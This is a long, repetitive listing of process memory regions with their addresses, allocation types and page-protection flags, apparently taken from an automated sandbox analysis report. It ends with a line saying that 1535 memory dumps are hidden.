page read and write
7005000
heap
page execute and read and write
5F7D000
heap
page read and write
5F5F000
heap
page read and write
3480000
heap
page read and write
607B000
heap
page read and write
5F59000
heap
page read and write
5F75000
heap
page read and write
7D0F000
stack
page read and write
A2ED000
heap
page read and write
5F5F000
heap
page read and write
5F7D000
heap
page read and write
288A000
heap
page read and write
A457000
heap
page read and write
5F84000
heap
page read and write
7593000
heap
page read and write
5F5F000
heap
page read and write
609F000
heap
page read and write
350A000
heap
page read and write
5F7D000
heap
page read and write
5F71000
heap
page read and write
5360000
heap
page execute and read and write
75F9000
trusted library allocation
page read and write
5F75000
heap
page read and write
B0A6000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
5F75000
heap
page read and write
273D000
stack
page read and write
3440000
trusted library allocation
page read and write
7970000
trusted library allocation
page read and write
5F75000
heap
page read and write
AD3C000
trusted library allocation
page read and write
5F83000
heap
page read and write
5F5A000
heap
page read and write
606C000
heap
page read and write
77B0000
trusted library allocation
page execute and read and write
8CBE000
stack
page read and write
AF41000
trusted library allocation
page execute
8D3E000
stack
page read and write
5F71000
heap
page read and write
8D50000
trusted library allocation
page read and write
60A8000
heap
page read and write
E5E1000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F5F000
heap
page read and write
5F5D000
heap
page read and write
AEF0000
trusted library allocation
page read and write
78F0000
trusted library allocation
page read and write
5F7D000
heap
page read and write
607B000
heap
page read and write
5F71000
heap
page read and write
5F5A000
heap
page read and write
5F75000
heap
page read and write
5F83000
heap
page read and write
47A8000
trusted library allocation
page read and write
95E1000
trusted library allocation
page read and write
5F7D000
heap
page read and write
BFE1000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
AF40000
trusted library allocation
page execute
5F5F000
heap
page read and write
7E20000
trusted library allocation
page read and write
5F7D000
heap
page read and write
5F5F000
heap
page read and write
28CA000
heap
page read and write
5F83000
heap
page read and write
7DD0000
trusted library allocation
page read and write
A2E0000
heap
page read and write
4DAF000
stack
page read and write
5F5F000
heap
page read and write
7DA0000
trusted library allocation
page read and write
5F5A000
heap
page read and write
5F59000
heap
page read and write
7410000
heap
page read and write
5F5F000
heap
page read and write
3561000
heap
page read and write
5F75000
heap
page read and write
5F59000
heap
page read and write
475E000
trusted library allocation
page read and write
5F71000
heap
page read and write
794E000
stack
page read and write
5F33000
heap
page read and write
6099000
heap
page read and write
34D0000
heap
page read and write
3100000
heap
page read and write
5F83000
heap
page read and write
2802000
heap
page read and write
605B000
heap
page read and write
6066000
heap
page read and write
5F7D000
heap
page read and write
60A1000
heap
page read and write
A672000
heap
page read and write
5F7D000
heap
page read and write
5F71000
heap
page read and write
6090000
heap
page read and write
7780000
trusted library allocation
page read and write
5F5F000
heap
page read and write
5F49000
heap
page read and write
AEF2000
trusted library allocation
page read and write
5F5F000
heap
page read and write
AE94000
trusted library allocation
page read and write
6021000
heap
page read and write
4A20000
heap
page read and write
5F7D000
heap
page read and write
718A000
stack
page read and write
7000000
heap
page execute and read and write
2887000
heap
page read and write
A927000
heap
page read and write
7C30000
trusted library allocation
page read and write
782F000
stack
page read and write
5F83000
heap
page read and write
606F000
heap
page read and write
5F83000
heap
page read and write
33A0000
heap
page read and write
6F88000
trusted library allocation
page read and write
7510000
trusted library allocation
page read and write
5F59000
heap
page read and write
5F5F000
heap
page read and write
7597000
heap
page read and write
5F71000
heap
page read and write
5F5F000
heap
page read and write
9475000
trusted library allocation
page read and write
75EE000
stack
page read and write
45F0000
heap
page read and write
607E000
heap
page read and write
737E000
stack
page read and write
CA8000
stack
page read and write
A3CE000
heap
page read and write
4E60000
trusted library allocation
page read and write
60F1000
heap
page read and write
34C3000
trusted library allocation
page execute and read and write
4A24000
heap
page read and write
4EAC000
stack
page read and write
5F5A000
heap
page read and write
5F71000
heap
page read and write
5F59000
heap
page read and write
ADB0000
heap
page read and write
5F58000
heap
page read and write
AD90000
trusted library allocation
page read and write
609E000
heap
page read and write
5F75000
heap
page read and write
5F5F000
heap
page read and write
5F83000
heap
page read and write
5F71000
heap
page read and write
5F71000
heap
page read and write
786E000
stack
page read and write
5F5F000
heap
page read and write
45F0000
heap
page read and write
8950000
trusted library allocation
page read and write
3060000
heap
page read and write
5F71000
heap
page read and write
77A0000
trusted library allocation
page execute and read and write
6066000
heap
page read and write
6061000
heap
page read and write
5F71000
heap
page read and write
5F71000
heap
page read and write
5F83000
heap
page read and write
E70000
heap
page read and write
4E73000
trusted library allocation
page read and write
756E000
stack
page read and write
5F7D000
heap
page read and write
607E000
heap
page read and write
5F75000
heap
page read and write
6074000
heap
page read and write
5F75000
heap
page read and write
5F83000
heap
page read and write
4818000
trusted library allocation
page read and write
5F5F000
heap
page read and write
6061000
heap
page read and write
AD3C000
trusted library allocation
page read and write
5F5F000
heap
page read and write
7E53000
trusted library allocation
page read and write
8F46000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
6088000
heap
page read and write
AD4E000
trusted library allocation
page read and write
6076000
heap
page read and write
5F84000
heap
page read and write
5F59000
heap
page read and write
5F50000
heap
page read and write
5F5A000
heap
page read and write
606B000
heap
page read and write
5F7D000
heap
page read and write
60F1000
heap
page read and write
45DC000
heap
page read and write
5F71000
heap
page read and write
5F7D000
heap
page read and write
A3BB000
heap
page read and write
AD32000
trusted library allocation
page read and write
8790000
heap
page read and write
5F75000
heap
page read and write
7520000
trusted library allocation
page execute and read and write
5F75000
heap
page read and write
5F7D000
heap
page read and write
279C000
heap
page read and write
5F75000
heap
page read and write
7613000
heap
page read and write
2760000
trusted library allocation
page read and write
A3A5000
heap
page read and write
5F7D000
heap
page read and write
AE94000
trusted library allocation
page read and write
5F5A000
heap
page read and write
5F59000
heap
page read and write
4DFE000
stack
page read and write
6066000
heap
page read and write
D7A000
heap
page read and write
724E000
stack
page read and write
60F1000
heap
page read and write
5F7D000
heap
page read and write
5F69000
heap
page read and write
5F71000
heap
page read and write
5F7D000
heap
page read and write
B177000
trusted library allocation
page read and write
5F71000
heap
page read and write
7CCE000
stack
page read and write
A2C1000
heap
page read and write
5F7D000
heap
page read and write
5F75000
heap
page read and write
5F7D000
heap
page read and write
8826000
stack
page read and write
5F83000
heap
page read and write
A6C0000
heap
page read and write
5F75000
heap
page read and write
75FE000
heap
page read and write
5F5F000
heap
page read and write
27A0000
heap
page read and write
5F83000
heap
page read and write
8F72000
trusted library allocation
page read and write
8920000
heap
page read and write
B0A6000
trusted library allocation
page read and write
B592000
heap
page read and write
5F7D000
heap
page read and write
5F75000
heap
page read and write
4D92000
trusted library allocation
page read and write
5F59000
heap
page read and write
5F5F000
heap
page read and write
4D0F000
stack
page read and write
5F5A000
heap
page read and write
5F7D000
heap
page read and write
A34A000
heap
page read and write
5F75000
heap
page read and write
5F6D000
heap
page read and write
5F7D000
heap
page read and write
766D000
heap
page read and write
7E50000
trusted library allocation
page read and write
5F5A000
heap
page read and write
285C000
heap
page read and write
6379000
trusted library allocation
page read and write
5F80000
heap
page read and write
4B2C000
stack
page read and write
8CFE000
stack
page read and write
5F75000
heap
page read and write
5F71000
heap
page read and write
5F5F000
heap
page read and write
7621000
heap
page read and write
5F5F000
heap
page read and write
60A5000
heap
page read and write
5F71000
heap
page read and write
5F5F000
heap
page read and write
5F71000
heap
page read and write
8840000
trusted library allocation
page execute and read and write
5F5F000
heap
page read and write
5F5F000
heap
page read and write
5F71000
heap
page read and write
5F83000
heap
page read and write
8380000
heap
page read and write
5F7D000
heap
page read and write
45D1000
heap
page read and write
AD4E000
trusted library allocation
page read and write
5F5F000
heap
page read and write
5F83000
heap
page read and write
A5D0000
trusted library allocation
page execute
7AF4000
heap
page read and write
A783000
heap
page read and write
5F83000
heap
page read and write
8F09000
trusted library allocation
page read and write
89B0000
trusted library allocation
page read and write
60F5000
heap
page read and write
50A5000
trusted library allocation
page read and write
5F71000
heap
page read and write
B0A6000
trusted library allocation
page read and write
34A0000
trusted library section
page read and write
35A0000
heap
page read and write
A2EB000
heap
page read and write
604F000
trusted library allocation
page read and write
5F75000
heap
page read and write
AEA0000
trusted library allocation
page read and write
6094000
heap
page read and write
5F5F000
heap
page read and write
5F5F000
heap
page read and write
610D000
heap
page read and write
5F7D000
heap
page read and write
5F5A000
heap
page read and write
5F7A000
heap
page read and write
5F5F000
heap
page read and write
5F71000
heap
page read and write
5F7D000
heap
page read and write
6061000
heap
page read and write
5F7D000
heap
page read and write
B5E1000
trusted library allocation
page read and write
A620000
heap
page read and write
5F7D000
heap
page read and write
A8A4000
heap
page read and write
75F0000
trusted library allocation
page read and write
5F6D000
heap
page read and write
5F5F000
heap
page read and write
5F5F000
heap
page read and write
C6C000
stack
page read and write
5F59000
heap
page read and write
5F83000
heap
page read and write
288D000
heap
page read and write
5F5F000
heap
page read and write
5F7D000
heap
page read and write
5F75000
heap
page read and write
34D8000
heap
page read and write
B44C000
stack
page read and write
5F48000
heap
page read and write
5F71000
heap
page read and write
5F20000
heap
page read and write
5F71000
heap
page read and write
5F71000
heap
page read and write
7940000
trusted library allocation
page read and write
AD4E000
trusted library allocation
page read and write
5F5F000
heap
page read and write
5F75000
heap
page read and write
A7A4000
heap
page read and write
2801000
heap
page read and write
5F7D000
heap
page read and write
60F1000
heap
page read and write
5F5F000
heap
page read and write
5F71000
heap
page read and write
5F5A000
heap
page read and write
5F7D000
heap
page read and write
611E000
heap
page read and write
6509000
trusted library allocation
page read and write
6055000
heap
page read and write
5F5F000
heap
page read and write
5F75000
heap
page read and write
564F000
trusted library allocation
page read and write
5F83000
heap
page read and write
73ED000
stack
page read and write
5F5F000
heap
page read and write
5F59000
heap
page read and write
5F5A000
heap
page read and write
A927000
heap
page read and write
4800000
trusted library allocation
page read and write
5F71000
heap
page read and write
9481000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F71000
heap
page read and write
5F75000
heap
page read and write
5F7D000
heap
page read and write
45F7000
heap
page read and write
6022000
heap
page read and write
5F5F000
heap
page read and write
5F5A000
heap
page read and write
5F71000
heap
page read and write
5F83000
heap
page read and write
6061000
heap
page read and write
5F5F000
heap
page read and write
AF20000
trusted library allocation
page read and write
4EB0000
heap
page read and write
D5E1000
trusted library allocation
page read and write
5F5A000
heap
page read and write
7790000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F75000
heap
page read and write
6522000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F71000
heap
page read and write
8930000
trusted library allocation
page execute and read and write
8FA0000
trusted library section
page read and write
5F5F000
heap
page read and write
DA2000
heap
page read and write
6106000
heap
page read and write
8390000
trusted library allocation
page execute and read and write
577A000
trusted library allocation
page read and write
84F5000
trusted library allocation
page read and write
5F83000
heap
page read and write
5F7D000
heap
page read and write
605C000
heap
page read and write
3240000
heap
page read and write
5F75000
heap
page read and write
5F7D000
heap
page read and write
5F5F000
heap
page read and write
5F7D000
heap
page read and write
A2A8000
heap
page read and write
60F1000
heap
page read and write
A356000
heap
page read and write
83A0000
trusted library allocation
page read and write
5F7D000
heap
page read and write
6054000
heap
page read and write
608B000
heap
page read and write
5F7D000
heap
page read and write
B0A6000
trusted library allocation
page read and write
7AD1000
heap
page read and write
B0A6000
trusted library allocation
page read and write
5F75000
heap
page read and write
5F75000
heap
page read and write
B551000
heap
page read and write
5F54000
heap
page read and write
6066000
heap
page read and write
B592000
heap
page read and write
533E000
stack
page read and write
733E000
stack
page read and write
5F71000
heap
page read and write
5F5A000
heap
page read and write
5F71000
heap
page read and write
A631000
heap
page read and write
5F7D000
heap
page read and write
580000
heap
page read and write
4C50000
trusted library allocation
page read and write
3410000
trusted library allocation
page read and write
B0A6000
trusted library allocation
page read and write
5F5D000
heap
page read and write
606B000
heap
page read and write
53A000
stack
page read and write
5F5F000
heap
page read and write
5F71000
heap
page read and write
5F7D000
heap
page read and write
75EB000
heap
page read and write
60F1000
heap
page read and write
7500000
heap
page execute and read and write
4D8A000
trusted library allocation
page execute and read and write
5F83000
heap
page read and write
5F75000
heap
page read and write
6030000
heap
page read and write
A762000
heap
page read and write
5F5A000
heap
page read and write
B310000
heap
page read and write
2744000
trusted library allocation
page read and write
5F5F000
heap
page read and write
8F5B000
trusted library allocation
page read and write
4BF0000
trusted library allocation
page read and write
35C4000
heap
page read and write
5F75000
heap
page read and write
5F71000
heap
page read and write
5F5F000
heap
page read and write
AD3C000
trusted library allocation
page read and write
A2DC000
heap
page read and write
5F5A000
heap
page read and write
5F84000
heap
page read and write
5F7D000
heap
page read and write
8EF4000
trusted library allocation
page read and write
609D000
heap
page read and write
5F83000
heap
page read and write
5F21000
heap
page read and write
A853000
heap
page read and write
A30A000
heap
page read and write
5634000
trusted library allocation
page read and write
A760000
heap
page read and write
798F000
stack
page read and write
45BF000
heap
page read and write
4F00000
trusted library allocation
page execute and read and write
5F75000
heap
page read and write
5F7D000
heap
page read and write
6F8E000
stack
page read and write
5F5A000
heap
page read and write
5F5C000
heap
page read and write
5F75000
heap
page read and write
5F71000
heap
page read and write
DFE1000
trusted library allocation
page read and write
B320000
heap
page read and write
5F71000
heap
page read and write
5F75000
heap
page read and write
5F83000
heap
page read and write
608B000
heap
page read and write
5F83000
heap
page read and write
A362000
heap
page read and write
AD08000
trusted library allocation
page read and write
4F10000
trusted library allocation
page read and write
5F7D000
heap
page read and write
5F84000
heap
page read and write
5F75000
heap
page read and write
3450000
trusted library allocation
page read and write
5371000
trusted library allocation
page read and write
6F0E000
stack
page read and write
89C8000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page execute and read and write
6055000
heap
page read and write
E0F000
heap
page read and write
54C8000
trusted library allocation
page read and write
5F75000
heap
page read and write
B0A6000
trusted library allocation
page read and write
A3CE000
heap
page read and write
577C000
trusted library allocation
page read and write
5F75000
heap
page read and write
5776000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
A7B5000
heap
page read and write
30CE000
stack
page read and write
5F71000
heap
page read and write
5F71000
heap
page read and write
7AB0000
trusted library allocation
page read and write
5F5A000
heap
page read and write
A46F000
heap
page read and write
5F5A000
heap
page read and write
AEA0000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
5F71000
heap
page read and write
28CB000
heap
page read and write
5F83000
heap
page read and write
AEC1000
trusted library allocation
page read and write
5F75000
heap
page read and write
5F5F000
heap
page read and write
5F75000
heap
page read and write
5F71000
heap
page read and write
7B91000
heap
page read and write
5F59000
heap
page read and write
5F59000
heap
page read and write
5E19000
trusted library allocation
page read and write
5F5F000
heap
page read and write
5F75000
heap
page read and write
75A3000
heap
page read and write
286D000
heap
page read and write
AEEB000
trusted library allocation
page read and write
5F84000
heap
page read and write
60CC000
heap
page read and write
5F7D000
heap
page read and write
5F71000
heap
page read and write
78C0000
trusted library allocation
page read and write
5F75000
heap
page read and write
5F75000
heap
page read and write
5F5F000
heap
page read and write
5F83000
heap
page read and write
5F75000
heap
page read and write
4D7D000
trusted library allocation
page execute and read and write
5F83000
heap
page read and write
60F1000
heap
page read and write
B54C000
stack
page read and write
5F5F000
heap
page read and write
288A000
heap
page read and write
4E50000
trusted library allocation
page read and write
5F75000
heap
page read and write
610F000
heap
page read and write
5F83000
heap
page read and write
4D70000
trusted library allocation
page read and write
5F7D000
heap
page read and write
45C8000
heap
page read and write
A484000
heap
page read and write
60CE000
heap
page read and write
6074000
heap
page read and write
6F4E000
stack
page read and write
5F71000
heap
page read and write
5F49000
heap
page read and write
5F83000
heap
page read and write
AEF4000
trusted library allocation
page read and write
5F5A000
heap
page read and write
B040000
trusted library allocation
page read and write
4C03000
trusted library allocation
page execute and read and write
5F59000
heap
page read and write
608B000
heap
page read and write
5F83000
heap
page read and write
5F59000
heap
page read and write
5F7D000
heap
page read and write
26FE000
stack
page read and write
5F75000
heap
page read and write
5F59000
heap
page read and write
5F71000
heap
page read and write
A9AB000
heap
page read and write
4742000
trusted library allocation
page read and write
761F000
heap
page read and write
AD4E000
trusted library allocation
page read and write
77D0000
trusted library allocation
page read and write
5F5F000
heap
page read and write
75BC000
heap
page read and write
5F80000
heap
page read and write
5F5F000
heap
page read and write
5F78000
heap
page read and write
5F71000
heap
page read and write
60F1000
heap
page read and write
5F71000
heap
page read and write
A3BB000
heap
page read and write
4E40000
heap
page readonly
5F83000
heap
page read and write
7B27000
heap
page read and write
A34B000
heap
page read and write
7900000
trusted library allocation
page read and write
5F59000
heap
page read and write
5F5F000
heap
page read and write
5F71000
heap
page read and write
5F59000
heap
page read and write
5F5C000
heap
page read and write
5F5F000
heap
page read and write
5F5C000
heap
page read and write
5F7D000
heap
page read and write
A96A000
heap
page read and write
2FC8000
stack
page read and write
5F5A000
heap
page read and write
4DB0000
trusted library allocation
page read and write
AFE0000
trusted library allocation
page read and write
5F54000
heap
page read and write
7E30000
trusted library allocation
page read and write
77C0000
trusted library allocation
page read and write
5F5F000
heap
page read and write
4D82000
trusted library allocation
page read and write
7B17000
heap
page read and write
5F4D000
heap
page read and write
5F83000
heap
page read and write
5F5A000
heap
page read and write
5F7D000
heap
page read and write
5F7D000
heap
page read and write
5F7D000
heap
page read and write
4C04000
trusted library allocation
page read and write
27E3000
heap
page read and write
5F5F000
heap
page read and write
34C4000
trusted library allocation
page read and write
5F83000
heap
page read and write
83D0000
trusted library allocation
page read and write
5F84000
heap
page read and write
45B4000
heap
page read and write
5F59000
heap
page read and write
563D000
trusted library allocation
page read and write
285C000
heap
page read and write
6024000
heap
page read and write
A320000
heap
page read and write
B03C000
trusted library allocation
page read and write
A75E000
heap
page read and write
5F5F000
heap
page read and write
5F5C000
heap
page read and write
5F5A000
heap
page read and write
70CE000
stack
page read and write
5F83000
heap
page read and write
5F59000
heap
page read and write
A2CB000
heap
page read and write
27D7000
heap
page read and write
5F75000
heap
page read and write
5F7D000
heap
page read and write
29CD000
stack
page read and write
AD05000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F5F000
heap
page read and write
6074000
heap
page read and write
A763000
heap
page read and write
5F83000
heap
page read and write
605C000
heap
page read and write
4C30000
trusted library allocation
page read and write
5F83000
heap
page read and write
5F83000
heap
page read and write
5F5F000
heap
page read and write
728B000
stack
page read and write
5F5F000
heap
page read and write
6076000
heap
page read and write
A3B6000
heap
page read and write
5F75000
heap
page read and write
7800000
trusted library allocation
page execute and read and write
83B0000
trusted library allocation
page read and write
4CCE000
stack
page read and write
5F5F000
heap
page read and write
5F5F000
heap
page read and write
564B000
trusted library allocation
page read and write
5F75000
heap
page read and write
73AF000
stack
page read and write
75E2000
heap
page read and write
7DB0000
trusted library allocation
page read and write
5F75000
heap
page read and write
AE58000
trusted library allocation
page read and write
5F83000
heap
page read and write
285C000
heap
page read and write
5F7D000
heap
page read and write
60A4000
heap
page read and write
6024000
heap
page read and write
5F5F000
heap
page read and write
2887000
heap
page read and write
5F75000
heap
page read and write
5F75000
heap
page read and write
5F75000
heap
page read and write
5F83000
heap
page read and write
A3CE000
heap
page read and write
848E000
stack
page read and write
2851000
heap
page read and write
7990000
trusted library allocation
page read and write
7DB5000
trusted library allocation
page read and write
5F7D000
heap
page read and write
5F71000
heap
page read and write
607E000
heap
page read and write
5F80000
heap
page read and write
5F71000
heap
page read and write
5F84000
heap
page read and write
5480000
heap
page read and write
7C21000
trusted library allocation
page read and write
5F7D000
heap
page read and write
A88C000
heap
page read and write
5F5F000
heap
page read and write
5F71000
heap
page read and write
5F5A000
heap
page read and write
5F75000
heap
page read and write
607B000
heap
page read and write
A32F000
heap
page read and write
9480000
trusted library allocation
page read and write
60F4000
heap
page read and write
5F59000
heap
page read and write
A2C4000
heap
page read and write
A2CB000
heap
page read and write
60DE000
heap
page read and write
3400000
trusted library allocation
page read and write
5F7D000
heap
page read and write
AEE9000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F83000
heap
page read and write
B550000
heap
page read and write
A416000
heap
page read and write
AD3C000
trusted library allocation
page read and write
AD05000
trusted library allocation
page read and write
AEC1000
trusted library allocation
page read and write
5F5F000
heap
page read and write
5F83000
heap
page read and write
605C000
heap
page read and write
5E7D000
trusted library allocation
page read and write
5F56000
heap
page read and write
5F71000
heap
page read and write
4D95000
trusted library allocation
page execute and read and write
651C000
trusted library allocation
page read and write
5F71000
heap
page read and write
8F2D000
trusted library allocation
page read and write
5F7D000
heap
page read and write
5F59000
heap
page read and write
5F83000
heap
page read and write
5F83000
heap
page read and write
3490000
trusted library section
page read and write
5F71000
heap
page read and write
4D18000
trusted library allocation
page read and write
7910000
trusted library allocation
page read and write
A760000
heap
page read and write
30F8000
heap
page read and write
2844000
heap
page read and write
5F75000
heap
page read and write
607E000
heap
page read and write
5F7D000
heap
page read and write
4C0D000
trusted library allocation
page execute and read and write
4D79000
trusted library allocation
page read and write
2F8C000
stack
page read and write
5385000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F75000
heap
page read and write
288D000
heap
page read and write
5F83000
heap
page read and write
45E7000
heap
page read and write
45B6000
heap
page read and write
5F75000
heap
page read and write
6371000
trusted library allocation
page read and write
60DF000
heap
page read and write
5F83000
heap
page read and write
714E000
stack
page read and write
4838000
trusted library allocation
page read and write
AEE9000
trusted library allocation
page read and write
5F71000
heap
page read and write
288D000
heap
page read and write
5F83000
heap
page read and write
4C19000
trusted library allocation
page read and write
5F71000
heap
page read and write
5F7D000
heap
page read and write
47CE000
trusted library allocation
page read and write
605B000
heap
page read and write
4F27000
heap
page read and write
AEEC000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
A2A8000
heap
page read and write
537D000
trusted library allocation
page read and write
5F5F000
heap
page read and write
5F75000
heap
page read and write
5F7D000
heap
page read and write
7DF0000
trusted library allocation
page read and write
5F7D000
heap
page read and write
AEED000
trusted library allocation
page read and write
A69F000
heap
page read and write
B0A6000
trusted library allocation
page read and write
5DD0000
remote allocation
page read and write
5F75000
heap
page read and write
286D000
heap
page read and write
5F83000
heap
page read and write
5F5F000
heap
page read and write
77EE000
stack
page read and write
2ACE000
stack
page read and write
5F4A000
heap
page read and write
78D0000
trusted library allocation
page execute and read and write
5F80000
heap
page read and write
6076000
heap
page read and write
4DAE000
stack
page read and write
7C40000
trusted library allocation
page read and write
5F73000
heap
page read and write
63DD000
trusted library allocation
page read and write
5F75000
heap
page read and write
5F5A000
heap
page read and write
5F71000
heap
page read and write
602B000
heap
page read and write
5F7D000
heap
page read and write
7740000
trusted library allocation
page read and write
5F75000
heap
page read and write
5F59000
heap
page read and write
5F59000
heap
page read and write
5F83000
heap
page read and write
5F83000
heap
page read and write
A7AC000
heap
page read and write
5F69000
heap
page read and write
A630000
heap
page read and write
5F5F000
heap
page read and write
5F75000
heap
page read and write
46B0000
heap
page read and write
7E9B000
stack
page read and write
5F5A000
heap
page read and write
3430000
trusted library allocation
page read and write
5F5F000
heap
page read and write
5F83000
heap
page read and write
5F7D000
heap
page read and write
5F5A000
heap
page read and write
4800000
trusted library allocation
page read and write
5F7D000
heap
page read and write
A9AB000
heap
page read and write
5F59000
heap
page read and write
A9AB000
heap
page read and write
5F83000
heap
page read and write
AD36000
trusted library allocation
page read and write
5F54000
heap
page read and write
5F7D000
heap
page read and write
5F75000
heap
page read and write
5F7D000
heap
page read and write
9582000
trusted library allocation
page read and write
5F71000
heap
page read and write
762C000
heap
page read and write
606B000
heap
page read and write
A673000
heap
page read and write
605B000
heap
page read and write
7530000
heap
page read and write
5F83000
heap
page read and write
8910000
heap
page read and write
7750000
trusted library allocation
page read and write
5F5A000
heap
page read and write
5F75000
heap
page read and write
680000
heap
page read and write
5F71000
heap
page read and write
A730000
heap
page read and write
7610000
heap
page read and write
5F71000
heap
page read and write
288D000
heap
page read and write
5F7D000
heap
page read and write
89C5000
trusted library allocation
page read and write
608B000
heap
page read and write
5F5C000
heap
page read and write
5E39000
trusted library allocation
page read and write
6E8E000
stack
page read and write
5F83000
heap
page read and write
5F5F000
heap
page read and write
D20000
heap
page read and write
A411000
heap
page read and write
282C000
heap
page read and write
4D90000
trusted library allocation
page read and write
947C000
trusted library allocation
page read and write
5F5F000
heap
page read and write
4F20000
heap
page read and write
5F5A000
heap
page read and write
83E0000
trusted library allocation
page read and write
A312000
heap
page read and write
45C8000
heap
page read and write
5F71000
heap
page read and write
8F4D000
trusted library allocation
page read and write
5F7D000
heap
page read and write
606F000
heap
page read and write
7E00000
trusted library allocation
page read and write
5F5F000
heap
page read and write
519E000
stack
page read and write
5F5A000
heap
page read and write
301F000
stack
page read and write
4EEF000
stack
page read and write
4E11000
trusted library allocation
page read and write
5F7D000
heap
page read and write
5F75000
heap
page read and write
5F5D000
heap
page read and write
8940000
trusted library allocation
page read and write
74BE000
stack
page read and write
5F59000
heap
page read and write
A333000
heap
page read and write
AD4E000
trusted library allocation
page read and write
89C0000
trusted library allocation
page read and write
7AD3000
heap
page read and write
4778000
trusted library allocation
page read and write
A2E3000
heap
page read and write
A2ED000
heap
page read and write
5F63000
heap
page read and write
890E000
stack
page read and write
8850000
trusted library allocation
page read and write
5F84000
heap
page read and write
77E0000
trusted library allocation
page execute and read and write
5F75000
heap
page read and write
5F59000
heap
page read and write
5F79000
heap
page read and write
4C32000
trusted library allocation
page read and write
4C80000
heap
page execute and read and write
7920000
trusted library allocation
page read and write
5F5F000
heap
page read and write
5F71000
heap
page read and write
A689000
heap
page read and write
75AB000
heap
page read and write
5F5F000
heap
page read and write
5F5A000
heap
page read and write
A458000
heap
page read and write
A3A4000
heap
page read and write
A2D7000
heap
page read and write
605C000
heap
page read and write
5F83000
heap
page read and write
710E000
stack
page read and write
A88B000
heap
page read and write
5F83000
heap
page read and write
5F6A000
heap
page read and write
A2C3000
heap
page read and write
602D000
heap
page read and write
5F78000
heap
page read and write
5F5A000
heap
page read and write
5F75000
heap
page read and write
5F83000
heap
page read and write
607E000
heap
page read and write
5F5A000
heap
page read and write
5F7D000
heap
page read and write
5F5F000
heap
page read and write
3080000
heap
page read and write
5F75000
heap
page read and write
5F83000
heap
page read and write
71CE000
stack
page read and write
2846000
heap
page read and write
5F7D000
heap
page read and write
5F75000
heap
page read and write
8C7E000
stack
page read and write
5F71000
heap
page read and write
AEE9000
trusted library allocation
page read and write
5F84000
heap
page read and write
A80C000
heap
page read and write
43A000
stack
page read and write
A46F000
heap
page read and write
5F7D000
heap
page read and write
AEE9000
trusted library allocation
page read and write
33F0000
heap
page read and write
5F75000
heap
page read and write
5F75000
heap
page read and write
720D000
stack
page read and write
5F83000
heap
page read and write
5F5A000
heap
page read and write
7AB7000
trusted library allocation
page read and write
47A0000
trusted library allocation
page read and write
5F83000
heap
page read and write
5F7D000
heap
page read and write
5F5F000
heap
page read and write
6061000
heap
page read and write
5F54000
heap
page read and write
6020000
heap
page read and write
3420000
trusted library allocation
page execute and read and write
75D4000
heap
page read and write
5F8A000
heap
page read and write
5F71000
heap
page read and write
5F83000
heap
page read and write
B020000
trusted library allocation
page read and write
5F5A000
heap
page read and write
ADF0000
trusted library allocation
page read and write
53D6000
trusted library allocation
page read and write
5F7D000
heap
page read and write
5F7D000
heap
page read and write
EFE1000
trusted library allocation
page read and write
5F84000
heap
page read and write
B0A6000
trusted library allocation
page read and write
There are 1535 hidden memdumps, click here to show them.